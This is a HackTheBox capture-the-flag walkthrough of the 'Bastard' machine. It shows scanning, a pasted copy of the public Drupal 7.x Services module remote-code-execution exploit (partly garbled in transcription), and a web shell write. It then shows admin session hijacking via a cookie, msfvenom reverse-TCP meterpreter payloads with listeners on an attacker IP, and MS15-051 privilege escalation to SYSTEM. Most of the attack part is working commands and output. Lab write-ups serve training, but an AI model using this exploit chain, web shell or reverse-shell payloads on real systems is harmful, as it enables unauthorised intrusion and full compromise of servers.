Bastard (HACKTHEBOX)

1) root@kali:~/Downloads# nmap -sC -sV -A 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-09 22:52 EDT
Nmap scan report for 10.10.10.9
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 165.73 ms 10.10.14.1
2 166.38 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.13 seconds

root@kali:~/Downloads/droopescan# pip install droopescan

2) root@kali:~/Downloads/droopescan# droopescan scan drupal -u 10.10.10.9
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/

[+] Possible interesting urls found:
Default changelog file – http://10.10.10.9/CHANGELOG.txt
Default admin – http://10.10.10.9/user/login

[+] Possible version(s):
7.54

[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/

[+] Scan finished (0:45:33.578193 elapsed)

3)

on browser …

http://10.10.10.9/CHANGELOG.txt

now we have identified drupal version 7.54

now search for exploit for this version

4)

root@kali:~/Downloads# searchsploit drupal

root@kali:~/Downloads# searchsploit -x /usr/share/exploitdb/platforms/php/webapps/41564.php

root@kali:~/Downloads# searchsploit -p php/webapps/41564.php
Exploit: Drupal 7.x Module Services – Remote Code Execution
URL: https://www.exploit-db.com/exploits/41564/
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators

Copied EDB-ID #41564’s path to the clipboard.
root@kali:~/Downloads# cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
root@kali:~/Downloads# mv 41564.php drupal.php
root@kali:~/Downloads# ls

ls

cat drupal.php

root@kali:~# gedit drupal.php

#!/usr/bin/php

‘troll.php’,

‘data’ => $payload1

];

$browser = new Browser($url . $endpoint_path);

# Stage 1: SQL Injection

class DatabaseCondition

{

protected $conditions = [

“#conjunction” => “AND”

];

protected $arguments = [];

protected $changed = false;

protected $queryPlaceholderIdentifier = null;

public $stringVersion = null;

public function __construct($stringVersion=null)

{

$this->stringVersion = $stringVersion;

if(!isset($stringVersion))

{

$this->changed = true;

$this->stringVersion = null;

}

}

}

class SelectQueryExtender {

# Contains a DatabaseCondition object instead of a SelectQueryInterface

# so that $query->compile() exists and (string) $query is controlled by us.

protected $query = null;

protected $uniqueIdentifier = QID;

protected $connection;

protected $placeholder = 0;

public function __construct($sql)

{

$this->query = new DatabaseCondition($sql);

}

}

$cache_id = “services:$endpoint:resources”;

$sql_cache = “SELECT data FROM {cache} WHERE cid=’$cache_id’”;

$password_hash = ‘$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd’;

# Take first user but with a custom password

# Store the original password hash in signature_format, and endpoint cache

# in signature

$query =

“0x3a) UNION SELECT ux.uid AS uid, “ .

“ux.name AS name, ‘$password_hash’ AS pass, “ .

“ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, “ .

“ux.pass AS signature_format, ux.created AS created, “ .

“ux.access AS access, ux.login AS login, ux.status AS status, “ .

“ux.timezone AS timezone, ux.language AS language, ux.picture “ .

“AS picture, ux.init AS init, ux.data AS data FROM {users} ux “ .

“WHERE ux.uid<>(0”

;

$query = new SelectQueryExtender($query);

$data = [‘username’ => $query, ‘password’ => ‘ouvreboite’];

$data = serialize($data);

$json = $browser->post(TYPE_PHP, $data);

# If this worked, the rest will as well

if(!isset($json->user))

{

print_r($json);

e(“Failed to login with fake password”);
}

# Store session and user data

$session = [

‘session_name’ => $json->session_name,

‘session_id’ => $json->sessid,

‘token’ => $json->token
];

store(‘session’, $session);

$user = $json->user;

# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back 🙂
$cache = unserialize($user->signature);

# Reassign fields

$user->pass = $user->signature_format;

unset($user->signature);

unset($user->signature_format);

store(‘user’, $user);

if($cache === false)

{

e(“Unable to obtains endpoint’s cache value”);

}

x(“Cache contains “ . sizeof($cache) . “ entries”);

# Stage 2: Change endpoint’s behaviour to write a shell

class DrupalCacheArray

{

# Cache ID

protected $cid = “services:endpoint_name:resources”;

# Name of the table to fetch data from.

# Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()

protected $bin = ‘cache’;

protected $keysToPersist = [];

protected $storage = [];

function __construct($storage, $endpoint, $controller, $action) {

$settings = [

‘services’ => [‘resource_api_version’ => ‘1.0’]

];

$this->cid = “services:$endpoint:resources”;

# If no endpoint is given, just reset the original values

if(isset($controller))

{

$storage[$controller][‘actions’][$action] = [

‘help’ => ‘Writes data to a file’,

# Callback function

‘callback’ => ‘file_put_contents’,

# This one does not accept “true” as Drupal does,

# so we just go for a tautology

‘access callback’ => ‘is_string’,

‘access arguments’ => [‘a string’],

# Arguments given through POST

‘args’ => [

0 => [

‘name’ => ‘filename’,

‘type’ => ‘string’,

‘description’ => ‘Path to the file’,

‘source’ => [‘data’ => ‘filename’],

‘optional’ => false,

],

1 => [

‘name’ => ‘data’,

‘type’ => ‘string’,

‘description’ => ‘The data to write’,

‘source’ => [‘data’ => ‘data’],

‘optional’ => false,

],

],

‘file’ => [

‘type’ => ‘inc’,

‘module’ => ‘services’,

‘name’ => ‘resources/user_resource’,

],

‘endpoint’ => $settings

];

$storage[$controller][‘endpoint’][‘actions’] += [

$action => [

‘enabled’ => 1,

‘settings’ => $settings

]

];

}

$this->storage = $storage;

$this->keysToPersist = array_fill_keys(array_keys($storage), true);

}

}

class ThemeRegistry Extends DrupalCacheArray {

protected $persistable;

protected $completeRegistry;

}

cache_poison($endpoint, $cache);

# Write the file

$json = (array) $browser->post(TYPE_JSON, json_encode($file));

# Stage 3: Restore endpoint’s behaviour

cache_reset($endpoint, $cache);

if(!(isset($json[0]) && $json[0] === strlen($file[‘data’])))

{

e(“Failed to write file.”);

}

$file_url = $url . ‘/’ . $file[‘filename’];

x(“File written: $file_url”);

# HTTP Browser

class Browser

{

private $url;

private $controller = CONTROLLER;

private $action = ACTION;

function __construct($url)

{

$this->url = $url;

}

function post($type, $data)

{

$headers = [

“Accept: “ . TYPE_JSON,

“Content-Type: $type”,

“Content-Length: “ . strlen($data)

];

$url = $this->url . ‘/’ . $this->controller . ‘/’ . $this->action;

$s = curl_init();

curl_setopt($s, CURLOPT_URL, $url);

curl_setopt($s, CURLOPT_HTTPHEADER, $headers);

curl_setopt($s, CURLOPT_POST, 1);

curl_setopt($s, CURLOPT_POSTFIELDS, $data);

curl_setopt($s, CURLOPT_RETURNTRANSFER, true);

curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);

$output = curl_exec($s);

$error = curl_error($s);

curl_close($s);

if($error)

{

e(“cURL: $error”);

}

return json_decode($output);

}

}

# Cache

function cache_poison($endpoint, $cache)

{

$tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);

cache_edit($tr);

}

function cache_reset($endpoint, $cache)

{

$tr = new ThemeRegistry($cache, $endpoint, null, null);

cache_edit($tr);

}

function cache_edit($tr)

{

global $browser;

$data = serialize([$tr]);

$json = $browser->post(TYPE_PHP, $data);

}

# Utils

function x($message)

{

print(“$message\n”);

}

function e($message)

{

x($message);

exit(1);

}

function store($name, $data)

{

$filename = “$name.json”;

file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));

x(“Stored $name information in $filename”);

}

root@kali:~# cat drupal.php

modify these content

$url = ‘http://10.10.10.9’;
$endpoint_path = ‘/rest’;
$endpoint = ‘rest_endpoint’;

‘filename’ => ‘ippsec.php’,
‘data’ => ‘

now save it

root@kali:~/Downloads/test# php drupal.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/ippsec.php

root@kali:~/Downloads# cat user.json
{
“uid”: “1”,
“name”: “admin”,
“mail”: “drupal@hackthebox.gr”,
“theme”: “”,
“created”: “1489920428”,
“access”: “1528312516”,
“login”: 1528637284,
“status”: “1”,
“timezone”: “Europe\/Athens”,
“language”: “”,
“picture”: null,
“init”: “drupal@hackthebox.gr”,
“data”: false,
“roles”: {
“2”: “authenticated user”,
“3”: “administrator”
},
“rdf_mapping”: {
“rdftype”: [
“sioc:UserAccount”
],
“name”: {
“predicates”: [
“foaf:name”
]
},
“homepage”: {
“predicates”: [
“foaf:page”
],
“type”: “rel”
}
},
“pass”: “$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE”
root@kali:~/Downloads/test# cat session.json
{
“session_name”: “SESSd873f26fc11f2b7e6e4aa0f6fce59913”,
“session_id”: “2yhnURzjO4SgIGJXwHiVi3LPdVvKgVLYBxfH-lVVYjY”,
“token”: “xUbqlyrWLrDa8WDNIh0pOszOCbBKEXooDuFLuwlHLtc”
}

SESSd873f26fc11f2b7e6e4aa0f6fce59913=2yhnURzjO4SgIGJXwHiVi3LPdVvKgVLYBxfH-lVVYjY;token=xUbqlyrWLrDa8WDNIh0pOszOCbBKEXooDuFLuwlHLtc;

http://10.10.10.9/ippsec.php?cmd=dir

output :

Volume in drive C has no label. Volume Serial Number is 605B-4AAA Directory of C:\inetpub\drupal-7.54 06/06/2018 10:32 ££
. 06/06/2018 10:32 ££
.. 19/03/2017 01:42 ££ 317 .editorconfig 19/03/2017 01:42 ££ 174 .gitignore 19/03/2017 01:42 ££ 5.969 .htaccess 19/03/2017 01:42 ££ 6.604 authorize.php 04/06/2018 11:53 ££ 257 bah.php 19/03/2017 01:42 ££ 110.781 CHANGELOG.txt 19/03/2017 01:42 ££ 1.481 COPYRIGHT.txt 19/03/2017 01:42 ££ 720 cron.php 19/03/2017 01:43 ££
includes 19/03/2017 01:42 ££ 529 index.php 19/03/2017 01:42 ££ 1.717 INSTALL.mysql.txt 19/03/2017 01:42 ££ 1.874 INSTALL.pgsql.txt 19/03/2017 01:42 ££ 703 install.php 19/03/2017 01:42 ££ 1.298 INSTALL.sqlite.txt 19/03/2017 01:42 ££ 17.995 INSTALL.txt 10/06/2018 04:28 ££ 36 ippsec.php 04/06/2018 11:53 ££ 0 kaka 19/03/2017 01:42 ££ 18.092 LICENSE.txt 19/03/2017 01:42 ££ 8.710 MAINTAINERS.txt 19/03/2017 01:43 ££
misc 19/03/2017 01:43 ££
modules 05/06/2018 12:27 §£ 55.296 ms15-051×64.exe 06/06/2018 10:33 ££ 6.144 MS15-051_Taihou64.exe 06/06/2018 10:17 ££ 43.696 nc64.exe 19/03/2017 01:43 ££
profiles 19/03/2017 01:42 ££ 5.382 README.txt 05/06/2018 12:11 §£ 73.802 rev.exe 05/06/2018 12:01 §£ 5.504 rev.php 05/06/2018 12:17 §£ 7.168 rev64.exe 19/03/2017 01:42 ££ 2.189 robots.txt 19/03/2017 01:43 ££
scripts 19/03/2017 01:43 ££
sites 06/06/2018 10:22 ££ 6.144 Taihou64.exe 19/03/2017 01:43 ££
themes 19/03/2017 01:42 ££ 19.986 update.php 19/03/2017 01:42 ££ 10.123 UPGRADE.txt 19/03/2017 01:42 ££ 2.200 web.config 19/03/2017 01:42 ££ 417 xmlrpc.php 31 File(s) 415.308 bytes 9 Dir(s) 30.788.538.368 bytes free 9 Dir(s) 30.788.538.368 bytes free

http://10.10.10.9/ippsec.php?cmd=systeminfo

Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00496-001-0001283-84782 Original Install Date: 18/3/2017, 7:04:46 ££ System Boot Time: 4/6/2018, 5:24:33 §£ System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.048 MB Available Physical Memory: 1.555 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.609 MB Virtual Memory: In Use: 486 MB Page File Location(s)

now try to access

http://10.10.10.9/admin

intercept the traffic on burp replace the cookie value with this … this we have created by combining the value of session.json

SESSd873f26fc11f2b7e6e4aa0f6fce59913=2yhnURzjO4SgIGJXwHiVi3LPdVvKgVLYBxfH-lVVYjY;token=xUbqlyrWLrDa8WDNIh0pOszOCbBKEXooDuFLuwlHLtc;

and close the interception

and we are in as admin

now click on modules from the top

now in it we have

PHP filter option tick that and then click save configuration

5)

on terminal

root@kali:~/Downloads/test# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.72 LPORT=4455 -e base64 -f raw > teck.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
[-] Skipping invalid encoder base64
[!] Couldn’t find encoder to use
No encoder or badchars specified, outputting raw payload
Payload size: 1112 bytes

root@kali:~/Downloads/test# cat teck.php
/* Article ->

name : test

Body :

use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 10.10.14.72
LHOST => 10.10.14.72

msf5 exploit(multi/handler) > set LPORT 4455
LPORT => 4455

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.72:4455
[*] Sending stage (38247 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.72:4455 -> 10.10.10.9:49363) at 2019-03-10 08:29:39 -0400

meterpreter > getuid
Server username: IUSR (0)
meterpreter > sysinfo
Computer : BASTARD
OS : Windows NT BASTARD 6.1 build 7600 (Windows Server 2008 R2 Datacenter Edition) i586
Meterpreter : php/windows

meterpreter >

root@kali:~/Downloads/test# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.72 LPORT=444 -f exe > teck.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

meterpreter > upload teck.exe
[*] uploading : teck.exe -> teck.exe
[*] Uploaded -1.00 B of 7.00 KiB (-0.01%): teck.exe -> teck.exe
[*] uploaded : teck.exe -> teck.exe

on another terminal start the listner of msf

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.72
LHOST => 10.10.14.72
msf5 exploit(multi/handler) > set LPORT 444
LPORT => 444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.72:444
[*] Sending stage (206403 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.72:444 -> 10.10.10.9:49369) at 2019-03-10 08:49:39 -0400

meterpreter >

once on previous meterpreter session execute below command

meterpreter > execute -f teck.exe

and on second msf session we get the session

meterpreter > getuid
Server username: IIS APPPOOL\Drupal
meterpreter > sysinfo
Computer : BASTARD
OS : Windows 2008 R2 (Build 7600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x64/windows

meterpreter > background
[*] Backgrounding session 1…

msf5 exploit(multi/handler) > use exploit/windows/local/ms15_051_client_copy_image

msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
SESSION => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.72
LHOST => 10.10.14.72

msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 888
LPORT => 888

msf5 exploit(windows/local/ms15_051_client_copy_image) > set TARGET 1
TARGET => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit

[*] Started reverse TCP handler on 192.168.96.147:888
[*] Launching notepad to host the exploit…
[+] Process 2328 launched.
[*] Reflectively injecting the exploit DLL into 2328…
[*] Injecting exploit into 2328…
[*] Exploit injected. Injecting payload into 2328…
[*] Payload injected. Executing exploit…
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.72
LHOST => 10.10.14.72

msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit

[*] Started reverse TCP handler on 10.10.14.72:888
[*] Launching notepad to host the exploit…
[+] Process 1116 launched.
[*] Reflectively injecting the exploit DLL into 1116…
[*] Injecting exploit into 1116…
[*] Exploit injected. Injecting payload into 1116…
[*] Payload injected. Executing exploit…
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.72:888 -> 10.10.10.9:49371) at 2019-03-10 08:53:19 -0400

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>cd c:\users\dimitris\Desktop
cd c:\users\dimitris\Desktop

c:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06ebXXXXXXXXXXXXXXXXXXXXXX

c:\Users\dimitris\Desktop>cd C:\users\Administrator\Desktop
cd C:\users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT